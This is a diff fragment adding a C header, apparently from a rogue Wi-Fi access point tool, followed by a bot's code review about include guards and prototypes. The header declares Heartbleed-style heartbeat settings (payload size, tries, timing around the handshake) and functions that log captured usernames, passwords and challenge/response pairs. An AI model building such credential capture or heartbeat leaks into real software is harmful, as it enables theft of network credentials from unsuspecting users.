4163+ unsigned int wpe_enable_return_success;
4164+#if OPENSSL_VERSION_NUMBER < 0x10100000L
4165+ unsigned int wpe_hb_send_before_handshake:1;
4166+ unsigned int wpe_hb_send_before_appdata:1;
4167+ unsigned int wpe_hb_send_after_appdata:1;
4168+ unsigned int wpe_hb_payload_size;
4169+ unsigned int wpe_hb_num_tries;
4170+ unsigned int wpe_hb_num_repeats;
4171+#endif /* OPENSSL_VERSION_NUMBER < 0x10100000L */
4172+};
4173+ 
4174+extern struct wpe_config wpe_conf;
4175+ 
4176+#if OPENSSL_VERSION_NUMBER < 0x10100000L
4177+ extern char wpe_hb_msg[];
4178+ extern size_t wpe_hb_msg_len;
4179+ 
4180+ //#define WPE_HB_MSG_LEN 8
4181+#endif /* OPENSSL_VERSION_NUMBER < 0x10100000L */
4182+ 
4183+#define n2s(c,s)((s=(((unsigned int)(c[0]))<< 8)| \
4184+ (((unsigned int)(c[1])) )),c+=2)
4185+ 
4186+#define s2n(s,c) ((c[0]=(unsigned char)(((s)>> 8)&0xff), \
4187+ c[1]=(unsigned char)(((s) )&0xff)),c+=2)
4188+ 
4189+ 
4190+void wpe_log_file_and_stdout(char const *fmt, ...);
4191+void wpe_log_chalresp(char *type, const u8 *username, size_t username_len, const u8 *challenge, size_t challenge_len, const u8 *response, size_t response_len);
4192+void wpe_log_basic(char *type, const u8 *username, size_t username_len, const u8 *password, size_t password_len);
4193+void wpe_hb_cb(int v_write_p, int v_version, int v_content_type, const void* v_buf, size_t v_len, SSL* v_ssl, void* v_arg);
4194+char *wpe_hb_clear();
4195
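Review bot: wpe.h has no include guard, and the `wpe_hb_cb` / `wpe_hb_clear` prototypes at the bottom sit outside the `OPENSSL_VERSION_NUMBER < 0x10100000L` block even though wpe.c only defines those functions inside it, so on OpenSSL 1.1 and later every includer sees declarations with no definition; wrap the two prototypes in the same `#if` and add `#ifndef WPE_H` / `#define WPE_H` at the top with `#endif /* WPE_H */` at the end. The header also uses `u8` and `FILE` without including `common.h` or `stdio.h`, which makes it compile only when included after them, and `char *wpe_hb_clear();` should be `char *wpe_hb_clear(void);`. The `n2s`/`s2n` macros advance their pointer argument (`c+=2`) as a side effect and evaluate `c` twice; a one-line comment such as `/* s2n/n2s advance the pointer c by 2 */` above them would save the next reader from the surprise, since `wpe_hb_clear` depends on it. The commented-out `//#define WPE_HB_MSG_LEN 8` should be removed, as `wpe_hb_msg_len` already carries that value.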